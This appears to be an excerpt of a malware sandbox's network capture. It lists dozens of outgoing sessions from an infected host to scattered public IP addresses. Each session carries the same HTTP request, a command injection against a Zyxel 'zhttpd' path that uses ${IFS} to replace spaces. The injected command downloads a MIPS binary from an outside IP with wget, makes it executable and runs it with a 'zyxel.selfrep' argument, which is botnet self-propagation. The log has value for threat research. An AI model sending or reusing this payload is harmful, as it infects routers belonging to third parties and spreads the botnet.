                                                Jan 28, 2024 10:16:26.828141928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4651192.168.2.2354532175.66.148.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828191996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4652192.168.2.235263839.219.176.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828224897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4653192.168.2.233850661.104.196.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828224897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4654192.168.2.2335704115.198.237.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828257084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4655192.168.2.235877644.208.200.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828311920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4656192.168.2.2343892143.216.96.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828311920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4657192.168.2.234416257.184.216.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828331947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4658192.168.2.235932468.120.186.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828351021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4659192.168.2.235337023.64.48.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828372955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4660192.168.2.234026271.241.233.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828393936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4661192.168.2.233299052.184.210.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828434944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4662192.168.2.23415129.147.192.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828461885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4663192.168.2.2346124212.47.12.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828465939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4664192.168.2.2346586160.46.76.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828525066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4665192.168.2.233900223.59.41.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828532934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4666192.168.2.2349356155.110.176.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828574896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4667192.168.2.2352882109.154.195.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828591108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4668192.168.2.2358638160.55.45.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828608990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4669192.168.2.23545868.19.69.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828644037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4670192.168.2.234671078.245.9.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828660011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4671192.168.2.2359454149.132.53.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828690052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4672192.168.2.235590440.147.235.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828712940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4673192.168.2.2343842171.92.197.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828747988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4674192.168.2.2350472172.248.104.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828766108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4675192.168.2.233568619.144.111.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828804970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4676192.168.2.2338010116.223.153.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828841925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4677192.168.2.233316898.62.146.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828869104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4678192.168.2.2345370212.99.12.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828906059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4679192.168.2.233400625.57.87.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828921080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4680192.168.2.235269671.32.151.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828939915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4681192.168.2.2359768102.17.229.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828969955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4682192.168.2.235837869.117.69.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829001904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4683192.168.2.233776271.46.162.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829029083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4684192.168.2.234731438.151.216.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829057932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4685192.168.2.2346822114.65.156.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829058886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4686192.168.2.234904225.208.169.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829077959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4687192.168.2.2350348141.91.41.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829124928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4688192.168.2.2340608197.110.9.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829143047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4689192.168.2.2358444145.187.121.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829190016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4690192.168.2.2341524119.239.115.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829215050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4691192.168.2.23437489.255.149.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829238892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4692192.168.2.2354832162.41.164.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829267979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4693192.168.2.2352646178.12.49.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829294920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4694192.168.2.235482473.121.5.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829325914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4695192.168.2.2354788170.160.230.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829338074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4696192.168.2.2346266145.133.180.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829364061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4697192.168.2.2357992181.99.190.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829390049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4698192.168.2.2333430159.73.187.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829411983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4699192.168.2.235220476.56.106.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829442024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4700192.168.2.2346240222.154.48.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829469919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4701192.168.2.235854691.168.189.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829495907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4702192.168.2.236006249.1.51.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829525948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4703192.168.2.234656064.215.121.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829535961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4704192.168.2.234528239.25.0.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829582930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4705192.168.2.233733473.6.222.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829602003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4706192.168.2.2350152203.160.12.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829629898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4707192.168.2.2353510181.15.149.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.829648018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4708192.168.2.233373865.202.213.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830065966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4709192.168.2.2359382188.184.67.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830102921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4710192.168.2.2349488183.26.205.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830110073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4711192.168.2.2353412149.5.147.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830146074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4712192.168.2.2347798218.162.22.6443
                                                TimestampBytes transferredDirectionData
